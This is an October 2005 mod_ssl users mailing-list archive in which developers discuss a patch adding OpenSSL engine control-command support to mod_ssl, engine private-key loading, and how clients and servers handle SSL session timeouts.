Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct  4 16:56:15 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8AB1114D872; Tue,  4 Oct 2005 16:56:15 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.202])
	by master.modssl.org (Postfix) with ESMTP id 0653314D83A
	for ; Tue,  4 Oct 2005 16:56:14 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id h32so162597wxd
        for ; Tue, 04 Oct 2005 07:56:11 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:reply-to:to:subject:cc:in-reply-to:mime-version:content-type:references;
        b=codl4Sx8cAu6yU0ypL3nbBGUfCObhlYM3PHiA1gkH/yPHdHuYWTd5ZlgJ4yPI06cVXyb9UAbRv8gLwz/+OgHhQNNAA0skCmw75vZ07y6NEDpF+guVprB03xm787QjLCLv+XJNJ4Pzxusdx7n97BnIG+gLFzpXCLGuJPJt2bfGAc=
Received: by 10.70.55.15 with SMTP id d15mr115484wxa;
        Tue, 04 Oct 2005 07:56:11 -0700 (PDT)
Received: by 10.70.57.7 with HTTP; Tue, 4 Oct 2005 07:56:11 -0700 (PDT)
Message-ID: <499d6ed30510040756g5b2e4e6ewd7ef4441e6b45dfa@mail.gmail.com>
Date: Tue, 4 Oct 2005 09:56:11 -0500
From: Kent Yoder 
To: Geoff Thorpe 
Subject: Re: engine format keys
Cc: modssl-users@modssl.org
In-Reply-To: <200510032216.42663.geoff@geoffthorpe.net>
MIME-Version: 1.0
Content-Type: multipart/mixed; 
	boundary="----=_Part_53611_15065888.1128437771231"
References: <499d6ed30509290928x1d2cc3e9h31a8a4524fae6a42@mail.gmail.com>
	 <200510032216.42663.geoff@geoffthorpe.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kent Yoder 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_53611_15065888.1128437771231
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

Hi Geoff,

> Sorry I didn't notice this earlier. I added some hooks to modssl ages ago
> to support engine ctrl-commands if that helps. In fact you may have to

  Thanks for the patch.  I don't think I'm going to be able to
accomplish what I wanted with control commands though.  Basically I
need my engine's load_privkey function to be called if
PEM_read_PrivateKey fails, or perhaps explicitly with some option to
modssl.

> jiggle with this patch if you want to update it to the latest mod_ssl
> version, but it may be easier than redoing it from scratch;
>
>    http://www.geoffthorpe.net/crypto/
>
> If you get it running with a more recent version and feel like giving me =
a
> newer diff, I'd appreciate being able to replace the one on my site. I
> don't think Ralf wants to include this functionality now that mod_ssl is
> just in maintenance-mode and (kinda) deprecated in favour of apache2.

  Ahh, I see.  Thanks for the info.  I guess the next step is to poke
the apache2 guys for openssl 0.9.8 support.  I did try compiling 2.1
beta with it without luck.  Updated patch attached...

Thanks,
Kent

> Cheers,
> Geoff
>
> --
> Geoff Thorpe
> geoff@geoffthorpe.net
> http://www.geoffthorpe.net/
>
> M=EAme ceux qui se sentent pas des n=F4tres, ne nous voyant plus =E0 geno=
ux,
> seront, plus que jamais, chez eux chez nous.
>   -- Loco Locass
>


--
Kent Yoder
IBM LTC Security Dev.

------=_Part_53611_15065888.1128437771231
Content-Type: text/x-patch; name=mod_ssl-2.8.24-1.3.33-control.diff; 
	charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="mod_ssl-2.8.24-1.3.33-control.diff"

diff -urN mod_ssl-2.8.24-1.3.33/pkg.sslmod/mod_ssl.c mod_ssl-2.8.24-1.3.33-eng_ctrl/pkg.sslmod/mod_ssl.c
--- mod_ssl-2.8.24-1.3.33/pkg.sslmod/mod_ssl.c	2005-07-06 03:32:14.000000000 -0500
+++ mod_ssl-2.8.24-1.3.33-eng_ctrl/pkg.sslmod/mod_ssl.c	2005-10-03 21:42:52.739731294 -0500
@@ -96,6 +96,9 @@
     AP_SRV_CMD(CryptoDevice, TAKE1,
                "SSL external Crypto Device usage "
                "(`builtin', `...')")
+    AP_SRV_CMD(CryptoDeviceCtrl, TAKE12,
+               "SSL external Crypto Device custom control commands "
+	       "(`cmd[:arg] [pre|post]')")
 #endif
     AP_SRV_CMD(RandomSeed, TAKE23,
                "SSL Pseudo Random Number Generator (PRNG) seeding source "
diff -urN mod_ssl-2.8.24-1.3.33/pkg.sslmod/mod_ssl.h mod_ssl-2.8.24-1.3.33-eng_ctrl/pkg.sslmod/mod_ssl.h
--- mod_ssl-2.8.24-1.3.33/pkg.sslmod/mod_ssl.h	2005-07-06 03:32:14.000000000 -0500
+++ mod_ssl-2.8.24-1.3.33-eng_ctrl/pkg.sslmod/mod_ssl.h	2005-10-03 21:42:52.741731054 -0500
@@ -557,6 +557,7 @@
     ssl_ds_table   *tPrivateKey;
 #ifdef SSL_EXPERIMENTAL_ENGINE
     char           *szCryptoDevice;
+    table          *tCryptoDeviceCtrl;
 #endif
     struct {
         void *pV1, *pV2, *pV3, *pV4, *pV5, *pV6, *pV7, *pV8, *pV9, *pV10;
@@ -653,6 +654,7 @@
 const char  *ssl_cmd_SSLMutex(cmd_parms *, char *, char *);
 const char  *ssl_cmd_SSLPassPhraseDialog(cmd_parms *, char *, char *);
 const char  *ssl_cmd_SSLCryptoDevice(cmd_parms *, char *, char *);
+const char  *ssl_cmd_SSLCryptoDeviceCtrl(cmd_parms *, char *, char *, char *);
 const char  *ssl_cmd_SSLRandomSeed(cmd_parms *, char *, char *, char *, char *);
 const char  *ssl_cmd_SSLEngine(cmd_parms *, char *, int);
 const char  *ssl_cmd_SSLCipherSuite(cmd_parms *, SSLDirConfigRec *, char *);
diff -urN mod_ssl-2.8.24-1.3.33/pkg.sslmod/ssl_engine_config.c mod_ssl-2.8.24-1.3.33-eng_ctrl/pkg.sslmod/ssl_engine_config.c
--- mod_ssl-2.8.24-1.3.33/pkg.sslmod/ssl_engine_config.c	2005-07-06 03:32:15.000000000 -0500
+++ mod_ssl-2.8.24-1.3.33-eng_ctrl/pkg.sslmod/ssl_engine_config.c	2005-10-03 21:42:52.743730814 -0500
@@ -142,6 +142,7 @@
         mc->tTmpKeys               = ssl_ds_table_make(pPool, sizeof(ssl_asn1_t));
 #ifdef SSL_EXPERIMENTAL_ENGINE
         mc->szCryptoDevice         = NULL;
+	mc->tCryptoDeviceCtrl     = ap_make_table(pPool, 10);
 #endif
 
         (void)memset(mc->pTmpKeys, 0, SSL_TKPIDX_MAX*sizeof(void *));
@@ -473,6 +474,64 @@
         return "SSLCryptoDevice: Invalid argument";
     return NULL;
 }
+
+/* Our static variables get reset between first and second pass ... so this
+ * variable is mixed in key-value strings and incremented. On the second pass,
+ * the key-values will match so will replace, rather than supplement, the table
+ * entries. (All this to prevent getting two copies of everything?!) */
+static int braindead = 0;
+
+const char *ssl_cmd_SSLCryptoDeviceCtrl(
+    cmd_parms *cmd, char *struct_ptr, char *arg, char *prepost)
+{
+    SSLModConfigRec *mc = myModConfig();
+    const char *err;
+    ENGINE *e;
+    char *colon, *value, *converted_arg, *converted_val;
+
+    if ((err = ap_check_cmd_context(cmd, GLOBAL_ONLY)) != NULL)
+        return err;
+    if ((e = ENGINE_by_id(mc->szCryptoDevice)) == NULL) {
+        err = "SSLCryptoDeviceCtrl: Must follow a valid engine";
+        goto end;
+    }
+    if (!ENGINE_ctrl(e, ENGINE_CTRL_HAS_CTRL_FUNCTION, 0, NULL, NULL)) {
+        err = "SSLCryptoDeviceCtrl: The engine has no 'ctrl' handler";
+        goto end;
+    }
+    if(prepost) {
+        if(strcmp(prepost, "pre") && strcmp(prepost, "post")) {
+            err = "SSLCryptoDeviceCtrl: Only 'pre' and 'post are valid options";
+            goto end;
+        }
+    } else
+        prepost = "pre";
+    /* Now separate out the argument into name:value (or name:'NULL' if there is
+     * no value). */
+    colon = strchr(arg, ':');
+    if(colon) {
+        *colon = '\0';
+        value = colon + 1;
+    } else
+        value = NULL;
+    if (ENGINE_ctrl(e, ENGINE_CTRL_GET_CMD_FROM_NAME, 0, arg, NULL) < 0) {
+        err = "SSLCryptoDeviceCtrl: The engine doesn't recognise that command";
+        goto end;
+    }
+    converted_arg = ap_palloc(cmd->pool, strlen(arg) + 5);
+    sprintf(converted_arg, "%i,%s", braindead++, arg);
+    if(!value)
+        converted_val = prepost;
+    else {
+        converted_val = ap_palloc(cmd->pool, strlen(value) + 5);
+        sprintf(converted_val, "%s%s", prepost, value);
+    }
+    ap_table_set(mc->tCryptoDeviceCtrl, converted_arg, converted_val);
+end:
+    if(e)
+        ENGINE_free(e);
+    return err;
+}
 #endif
 
 const char *ssl_cmd_SSLRandomSeed(
diff -urN mod_ssl-2.8.24-1.3.33/pkg.sslmod/ssl_engine_init.c mod_ssl-2.8.24-1.3.33-eng_ctrl/pkg.sslmod/ssl_engine_init.c
--- mod_ssl-2.8.24-1.3.33/pkg.sslmod/ssl_engine_init.c	2005-07-06 03:32:15.000000000 -0500
+++ mod_ssl-2.8.24-1.3.33-eng_ctrl/pkg.sslmod/ssl_engine_init.c	2005-10-03 21:49:15.351710550 -0500
@@ -341,10 +341,40 @@
  * a hardware accellerator card for crypto operations.
  */
 #ifdef SSL_EXPERIMENTAL_ENGINE
+typedef struct st_engine_dummy {
+	ENGINE *e;
+	int ispost;
+	const char *bailed;
+} engine_dummy;
+static int internal_ctrl_cb(void *r, const char *k, const char *v)
+{
+	engine_dummy *d = (engine_dummy *)r;
+	while(isdigit(*k) || (*k == ','))
+		k++;
+	if(strncmp(v, "post", 4) == 0) {
+		/* This key-value pair is for "post" operation */
+		if(!d->ispost)
+			return 1;
+		v += 4;
+	} else {
+		/* This key-value pair is for "pre" operation */
+		if(d->ispost)
+			return 1;
+		v += 3;
+	}
+	if(strlen(v) == 0)
+		v = NULL;
+	if(!ENGINE_ctrl_cmd_string(d->e, k, v, 0)) {
+		d->bailed = k;
+		return 0;
+	}
+	return 1;
+}
 void ssl_init_Engine(server_rec *s, pool *p)
 {
     SSLModConfigRec *mc = myModConfig();
     ENGINE *e;
+    engine_dummy d;
 
     if (mc->szCryptoDevice != NULL) {
         if ((e = ENGINE_by_id(mc->szCryptoDevice)) == NULL) {
@@ -352,6 +382,17 @@
                     mc->szCryptoDevice);
             ssl_die();
         }
+
+	d.e = e;
+	d.ispost = 0;
+	d.bailed = NULL;
+	ap_table_do(internal_ctrl_cb, &d, mc->tCryptoDeviceCtrl, NULL);
+	if(d.bailed) {
+		ssl_log(s, SSL_LOG_ERROR, "Init: Failed on command '%s'", d.bailed);
+		ssl_die();
+	}
+
+
         if (strEQ(mc->szCryptoDevice, "chil")) 
             ENGINE_ctrl(e, ENGINE_CTRL_CHIL_SET_FORKCHECK, 1, 0, 0);
         if (!ENGINE_set_default(e, ENGINE_METHOD_ALL)) {
@@ -359,6 +400,14 @@
                     mc->szCryptoDevice);
             ssl_die();
         }
+
+	d.ispost = 1;
+	ap_table_do(internal_ctrl_cb, &d, mc->tCryptoDeviceCtrl, NULL);
+	if(d.bailed) {
+		ssl_log(s, SSL_LOG_ERROR, "Init: Failed on command '%s'", d.bailed);
+		ssl_die();
+	}
+
         ENGINE_free(e);
     }
     return;



------=_Part_53611_15065888.1128437771231--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct  4 18:30:25 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3C9F014D870; Tue,  4 Oct 2005 18:30:25 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from geiger.vandervecken.com (geiger.vandervecken.com [203.97.150.130])
	by master.modssl.org (Postfix) with ESMTP id 88C0B14D83A
	for ; Tue,  4 Oct 2005 18:30:23 +0200 (CEST)
Received: from geoff by geiger.vandervecken.com with local (Exim 4.50)
	id 1EMpgN-00057G-Qa; Wed, 05 Oct 2005 05:30:24 +1300
From: Geoff Thorpe 
To: modssl-users@modssl.org
Subject: Re: engine format keys
Date: Tue, 4 Oct 2005 12:30:13 -0400
User-Agent: KMail/1.8.1
References: <499d6ed30509290928x1d2cc3e9h31a8a4524fae6a42@mail.gmail.com> <200510032216.42663.geoff@geoffthorpe.net> <499d6ed30510040756g5b2e4e6ewd7ef4441e6b45dfa@mail.gmail.com>
In-Reply-To: <499d6ed30510040756g5b2e4e6ewd7ef4441e6b45dfa@mail.gmail.com>
MIME-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Message-Id: <200510041230.14023.geoff@geoffthorpe.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On October 4, 2005 10:56 am, Kent Yoder wrote:
> Hi Geoff,
>
> > Sorry I didn't notice this earlier. I added some hooks to modssl ages
> > ago to support engine ctrl-commands if that helps. In fact you may
> > have to
>
>   Thanks for the patch.  I don't think I'm going to be able to
> accomplish what I wanted with control commands though.  Basically I
> need my engine's load_privkey function to be called if
> PEM_read_PrivateKey fails, or perhaps explicitly with some option to
> modssl.

Ah, right. You'll also need to ensure that the initialisation order allows=
=20
the engine to be properly initialised (including maybe some control=20
commands to prepare anything the engine needs) *before* the key is=20
loaded. I have a vague recollection that this isn't the case? Though I=20
could be wide of the mark here.

>   Ahh, I see.  Thanks for the info.  I guess the next step is to poke
> the apache2 guys for openssl 0.9.8 support.  I did try compiling 2.1
> beta with it without luck.

I'd suggest you contact Joe Orton - in fact he's probably on this list=20
too. If the 2.1 beta (and/or cvs HEAD) don't properly handle 0.9.8, then=20
there's a problem.

> Updated patch attached...=20

Thanks :-)

Cheers,
Geoff

=2D-=20
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/

M=EAme ceux qui se sentent pas des n=F4tres, ne nous voyant plus =E0 genoux,
seront, plus que jamais, chez eux chez nous.
  -- Loco Locass
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct  4 20:22:05 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id BF0B014D86C; Tue,  4 Oct 2005 20:22:05 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.206])
	by master.modssl.org (Postfix) with ESMTP id 39B0814D83A
	for ; Tue,  4 Oct 2005 20:22:04 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id h32so176159wxd
        for ; Tue, 04 Oct 2005 11:22:03 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:reply-to:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=kKmEjts/gC/DfW9P6jlg8iawOtzcy1TDFsYMKeGUr8zqrMS7NBLqLO7rj8fgqgQC4kxZriK42S3RdVbBCqMGUFtoavOflkifZKdGkS+IvuWQv4Tj6rWvKmOni2G1+ZEL+8//Edhw8UtLRnfawJ12eXrnBJSmz4rbzNCMoHEjFus=
Received: by 10.70.57.16 with SMTP id f16mr120665wxa;
        Tue, 04 Oct 2005 11:22:03 -0700 (PDT)
Received: by 10.70.57.7 with HTTP; Tue, 4 Oct 2005 11:22:03 -0700 (PDT)
Message-ID: <499d6ed30510041122w73a9ee15r86c5131a4851fa8@mail.gmail.com>
Date: Tue, 4 Oct 2005 13:22:03 -0500
From: Kent Yoder 
To: modssl-users@modssl.org
Subject: Re: engine format keys
In-Reply-To: <200510041230.14023.geoff@geoffthorpe.net>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: <499d6ed30509290928x1d2cc3e9h31a8a4524fae6a42@mail.gmail.com>
	 <200510032216.42663.geoff@geoffthorpe.net>
	 <499d6ed30510040756g5b2e4e6ewd7ef4441e6b45dfa@mail.gmail.com>
	 <200510041230.14023.geoff@geoffthorpe.net>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kent Yoder 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Geoff,

> Ah, right. You'll also need to ensure that the initialisation order allow=
s
> the engine to be properly initialised (including maybe some control
> commands to prepare anything the engine needs) *before* the key is
> loaded. I have a vague recollection that this isn't the case? Though I
> could be wide of the mark here.

  I think init of the engine may be ok, but I'm not sure where my
problem lies right now.  Maybe in password input, or somewhere else...

> >   Ahh, I see.  Thanks for the info.  I guess the next step is to poke
> > the apache2 guys for openssl 0.9.8 support.  I did try compiling 2.1
> > beta with it without luck.
>
> I'd suggest you contact Joe Orton - in fact he's probably on this list
> too. If the 2.1 beta (and/or cvs HEAD) don't properly handle 0.9.8, then
> there's a problem.

  Yep, I was wrong about this..  I'm working on 2.1.8 right now which
compiles fine. I'll post when I can narrow down the problem any more.

Thanks for the help,
Kent
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct  6 09:07:30 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id F22D114D879; Thu,  6 Oct 2005 09:07:29 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from pimx11.scig.gov.hk (pimx11.scig.gov.hk [202.128.225.30])
	by master.modssl.org (Postfix) with ESMTP id D2F1C14D82F
	for ; Thu,  6 Oct 2005 09:07:27 +0200 (CEST)
Received: from gcnsmtp05.support.gcn.gov.hk ([10.94.3.165])
          by pimx11.scig.gov.hk
          (InterMail vK.4.04.00.00 201-232-137 license 7b83deafafcacc459204a5d090d1b104)
          with ESMTP
          id <20051006070823.GMMD7116.pimx11@gcnsmtp05.support.gcn.gov.hk>
          for ; Thu, 6 Oct 2005 15:08:23 +0800
To: modssl-users@modssl.org
Subject: configure SSL session timeout
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 5.0.11   July 24, 2002
Message-ID: 
From: ktchow@ogcio.gov.hk
Date: Thu, 6 Oct 2005 15:07:18 +0800
X-MIMETrack: Serialize by Router on GCNSMTP05/SERVERS/GCNDMZ/HKSARG(Release 6.52HF927 | April
 15, 2005) at 10/06/2005 15:07:24,
	Serialize complete at 10/06/2005 15:07:24
Content-Type: multipart/alternative; boundary="=_alternative 00271EF648257092_="
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: ktchow@ogcio.gov.hk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multipart message in MIME format.
--=_alternative 00271EF648257092_=
Content-Type: text/plain; charset="us-ascii"

Dear All,

I know the SSL session timeout param can be configured by the directive 
"SSLSessionCacheTimeout". Is there any setting or API for the browser or 
client application to configure the SSL session timeout param and override 
the server's one such that each application can configure their timeout 
period of the SSL connection according to their requirement?

Please advise and regards,

KT Chow
--=_alternative 00271EF648257092_=
Content-Type: text/html; charset="us-ascii"



Dear All,



I know the SSL session timeout param can be configured by the directive "SSLSessionCacheTimeout". Is there any setting or API for the browser or client application to configure the SSL session timeout param and override the server's one such that each application can configure their timeout period of the SSL connection according to their requirement?



Please advise and regards,



KT Chow
--=_alternative 00271EF648257092_=--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct  6 15:51:50 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3374E14D879; Thu,  6 Oct 2005 15:51:50 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.207])
	by master.modssl.org (Postfix) with ESMTP id C10F014D82F
	for ; Thu,  6 Oct 2005 15:51:49 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id h31so310312wxd
        for ; Thu, 06 Oct 2005 06:51:47 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:reply-to:sender:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=kDIMlxamegjpZZYHfHI+fXrdsKiq0ARTLKWcXLV0YLt+9iSqRV4T3fzFoOsOSPq1M2Z1Pygo7oXxwV4u2NAyX9aHSDpV/V9NU0dsK8HPbDNp5c2qlU01wXBGpGAkT9tyctBIcq1GMST+HgiWQjZur4W4fJYHZ0O7e2J2HpwdYqo=
Received: by 10.70.54.13 with SMTP id c13mr1264810wxa;
        Thu, 06 Oct 2005 06:51:47 -0700 (PDT)
Received: by 10.70.75.5 with HTTP; Thu, 6 Oct 2005 06:51:47 -0700 (PDT)
Message-ID: 
Date: Thu, 6 Oct 2005 09:51:47 -0400
From: Cliff Woolley 
To: modssl-users@modssl.org
Subject: Re: configure SSL session timeout
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> I know the SSL session timeout param can be configured by the directive
> "SSLSessionCacheTimeout". Is there any setting or API for the browser or
> client application to configure the SSL session timeout param and overrid=
e
> the server's one such that each application can configure their timeout
> period of the SSL connection according to their requirement?

Nope... not that I know of.

--Cliff
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct  6 17:11:23 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7E93214D879; Thu,  6 Oct 2005 17:11:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cr.toftum.org (cpe.atm2-0-76391.0x535ae692.bynxx16.customer.tele.dk [83.90.230.146])
	by master.modssl.org (Postfix) with ESMTP id 49CCD14D82F
	for ; Thu,  6 Oct 2005 17:11:22 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by cr.toftum.org (Postfix) with ESMTP id D90312EC04D
	for ; Thu,  6 Oct 2005 17:27:48 +0200 (CEST)
Received: from cr.toftum.org ([127.0.0.1])
 by localhost (cr.toftum.org [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
 id 24228-06 for ;
 Thu,  6 Oct 2005 17:27:44 +0200 (CEST)
Received: by cr.toftum.org (Postfix, from userid 1000)
	id 5EFB12EC4A8; Thu,  6 Oct 2005 17:27:44 +0200 (CEST)
Date: Thu, 6 Oct 2005 17:27:44 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: configure SSL session timeout
Message-ID: <20051006152744.GE28059@cr>
Mail-Followup-To: modssl-users@modssl.org
References:  
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
X-Virus-Scanned: amavisd-new at toftum.dk
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, Oct 06, 2005 at 09:51:47AM -0400, Cliff Woolley wrote:
> > I know the SSL session timeout param can be configured by the directive
> > "SSLSessionCacheTimeout". Is there any setting or API for the browser or
> > client application to configure the SSL session timeout param and override
> > the server's one such that each application can configure their timeout
> > period of the SSL connection according to their requirement?
> 
> Nope... not that I know of.
> 
Just to clear this up - both the client and the server choose wether
they want to reuse sessions. SSLSessionCacheTimeout sets how long the
server is willing to reuse a session, but a client may choose not to
reuse the session after a shorter time. When a session expires on the
server, a client may try to reuse the session, but the server won't
allow that.
One example of a client using short session times is IE which would
expire SSL2 sessions really fast, but allow TLSv1 with strong crypto to
live much longer (that experience is a couple of years old, so they've
probably changed the policy many times over since then).

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct  6 23:01:32 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7DEE014D87A; Thu,  6 Oct 2005 23:01:31 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from xproxy.gmail.com (xproxy.gmail.com [66.249.82.201])
	by master.modssl.org (Postfix) with ESMTP id DF1F214D82F
	for ; Thu,  6 Oct 2005 23:01:24 +0200 (CEST)
Received: by xproxy.gmail.com with SMTP id h32so132738wxd
        for ; Thu, 06 Oct 2005 14:01:23 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:reply-to:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=P25f0ANGSacJ5ItI+tqAAFm++gbkclENBjsU+CYSDCGazhjm/BYVpEwfH7GZTmXh6o2J+jxbf7sQVSfYMscRRwBtPNBCbZfZIr2nCYTJcO/4L8AnGfgRlmWIFXRtyr/a2eMgQWshU/GyYSBz4lploxf9tqpUGPjUlBBEGnRbMok=
Received: by 10.70.55.19 with SMTP id d19mr52249wxa;
        Thu, 06 Oct 2005 14:01:23 -0700 (PDT)
Received: by 10.70.57.7 with HTTP; Thu, 6 Oct 2005 14:01:23 -0700 (PDT)
Message-ID: <499d6ed30510061401n72381dbcn2ae204e4c1372024@mail.gmail.com>
Date: Thu, 6 Oct 2005 16:01:23 -0500
From: Kent Yoder 
To: modssl-users@modssl.org
Subject: Re: engine format keys
In-Reply-To: <499d6ed30510041122w73a9ee15r86c5131a4851fa8@mail.gmail.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
References: <499d6ed30509290928x1d2cc3e9h31a8a4524fae6a42@mail.gmail.com>
	 <200510032216.42663.geoff@geoffthorpe.net>
	 <499d6ed30510040756g5b2e4e6ewd7ef4441e6b45dfa@mail.gmail.com>
	 <200510041230.14023.geoff@geoffthorpe.net>
	 <499d6ed30510041122w73a9ee15r86c5131a4851fa8@mail.gmail.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kent Yoder 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> > Ah, right. You'll also need to ensure that the initialisation order all=
ows
> > the engine to be properly initialised (including maybe some control
> > commands to prepare anything the engine needs) *before* the key is
> > loaded. I have a vague recollection that this isn't the case? Though I
> > could be wide of the mark here.
>
>   I think init of the engine may be ok, but I'm not sure where my
> problem lies right now.  Maybe in password input, or somewhere else...

  Yep, passphrase entry is at least part of the problem with calling
ENGINE_load_private_key.   After a few different attempts, I'm a bit
stumped.  The load key call wants a UI* passed to it, which eventually
has UI_process() called on it by the engine.  I've tried various ways
of stuffing the modssl_read_bio_cb_fn pointer and the server rec into
this structure, with a custom flush function which'd get called by
UI_process.  I haven't been able to test this approach yet, since it
appears that openssl's UI_STRING and UI_METHOD structs aren't declared
in a way that works in ui.h. For instance, any mention of
sizeof(UI_STRING) brings an incomplete type error.  Any help would be
appreciated, I may not be using the ui interface correctly.

Thanks,
Kent

> > >   Ahh, I see.  Thanks for the info.  I guess the next step is to poke
> > > the apache2 guys for openssl 0.9.8 support.  I did try compiling 2.1
> > > beta with it without luck.
> >
> > I'd suggest you contact Joe Orton - in fact he's probably on this list
> > too. If the 2.1 beta (and/or cvs HEAD) don't properly handle 0.9.8, the=
n
> > there's a problem.
>
>   Yep, I was wrong about this..  I'm working on 2.1.8 right now which
> compiles fine. I'll post when I can narrow down the problem any more.
>
> Thanks for the help,
> Kent
>


--
Kent Yoder
IBM LTC Security Dev.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 11 12:39:12 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
